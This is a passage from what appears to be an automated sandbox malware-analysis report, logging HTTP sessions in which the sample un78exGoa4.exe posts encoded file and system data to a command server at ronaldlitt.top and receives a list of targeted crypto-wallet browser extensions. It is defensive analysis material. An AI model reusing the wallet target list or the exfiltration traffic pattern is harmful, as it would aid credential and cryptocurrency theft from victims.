39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 47 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbG
May 28, 2023 09:29:40.922888041 CEST	100	IN	Data Raw: 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a Data Ascii: xldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkb
May 28, 2023 09:29:40.922908068 CEST	101	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 Data Ascii: V2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF
May 28, 2023 09:29:40.922950983 CEST	103	IN	Data Raw: 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 Data Ascii: ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoY
May 28, 2023 09:29:40.922969103 CEST	103	IN	Data Raw: 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 Data Ascii: bG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49731	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:46.080209017 CEST	1451	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKE Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:46.080291033 CEST	1453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:46.193716049 CEST	1453	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49732	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:46.271675110 CEST	1454	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDB Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:46.271754980 CEST	1455	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:46.388382912 CEST	1456	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49733	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:46.453111887 CEST	1456	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDA Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:46.453183889 CEST	1458	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:46.567115068 CEST	1459	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49734	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:46.658704042 CEST	1459	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:46.658767939 CEST	1461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:46.747884989 CEST	1461	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49735	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:46.837074041 CEST	1462	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:46.837141991 CEST	1464	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:46.932673931 CEST	1464	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49736	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:47.022289038 CEST	1465	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:47.022367001 CEST	1466	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:47.110063076 CEST	1467	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49737	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:47.179013014 CEST	1467	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:47.179066896 CEST	1469	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:47.278997898 CEST	1469	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49738	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:47.346288919 CEST	1470	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:47.346379042 CEST	1472	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:47.458448887 CEST	1472	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49739	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:47.524866104 CEST	1473	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:47.524924040 CEST	1475	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:47.648155928 CEST	1475	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49740	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:47.722225904 CEST	1475	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:47.722302914 CEST	1477	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:47.840580940 CEST	1478	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49714	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:41.213331938 CEST	104	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH Host: ronaldlitt.top Content-Length: 19019 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:41.213427067 CEST	115	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
May 28, 2023 09:29:41.274143934 CEST	121	OUT	Data Raw: 67 4d 6a 41 78 4e 69 41 74 49 44 45 32 4c 6a 41 75 4e 44 49 32 4e 69 34 78 4d 44 41 78 43 67 6c 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 54 32 5a 6d 61 57 4e 6c 49 45 39 54 54 53 42 56 57 43 42 4e 56 55 6b 67 4b 45 56 75 5a 32 78 70 63 32 67 70 49 Data Ascii: gMjAxNiAtIDE2LjAuNDI2Ni4xMDAxCglNaWNyb3NvZnQgT2ZmaWNlIE9TTSBVWCBNVUkgKEVuZ2xpc2gpIDIwMTYgLSAxNi4wLjQyNjYuMTAwMQoJTWljcm9zb2Z0IE9mZmljZSBTaGFyZWQgU2V0dXAgTWV0YWRhdGEgTVVJIChFbmdsaXNoKSAyMDE2IC0gMTYuMC40MjY2LjEwMDEKCU1pY3Jvc29mdCBBY2Nlc3MgU2V0dX
May 28, 2023 09:29:41.274224997 CEST	123	OUT	Data Raw: 47 55 4b 43 55 78 44 51 6c 4e 79 61 47 64 6d 56 6b 4a 50 64 32 70 58 63 6c 4e 51 63 57 35 73 52 55 74 51 55 33 4a 54 54 30 4e 4e 63 69 35 6c 65 47 55 4b 43 55 78 44 51 6c 4e 79 61 47 64 6d 56 6b 4a 50 64 32 70 58 63 6c 4e 51 63 57 35 73 52 55 74 Data Ascii: GUKCUxDQlNyaGdmVkJPd2pXclNQcW5sRUtQU3JTT0NNci5leGUKCUxDQlNyaGdmVkJPd2pXclNQcW5sRUtQU3JTT0NNci5leGUKCUxDQlNyaGdmVkJPd2pXclNQcW5sRUtQU3JTT0NNci5leGUKCUxDQlNyaGdmVkJPd2pXclNQcW5sRUtQU3JTT0NNci5leGUKCUxDQlNyaGdmVkJPd2pXclNQcW5sRUtQU3JTT0NNci5leGUK
May 28, 2023 09:29:41.392819881 CEST	123	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49741	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:47.918241978 CEST	1478	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:47.918301105 CEST	1480	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:48.013151884 CEST	1480	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49742	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:48.080434084 CEST	1481	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:48.080657005 CEST	1483	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:48.164910078 CEST	1483	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49743	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
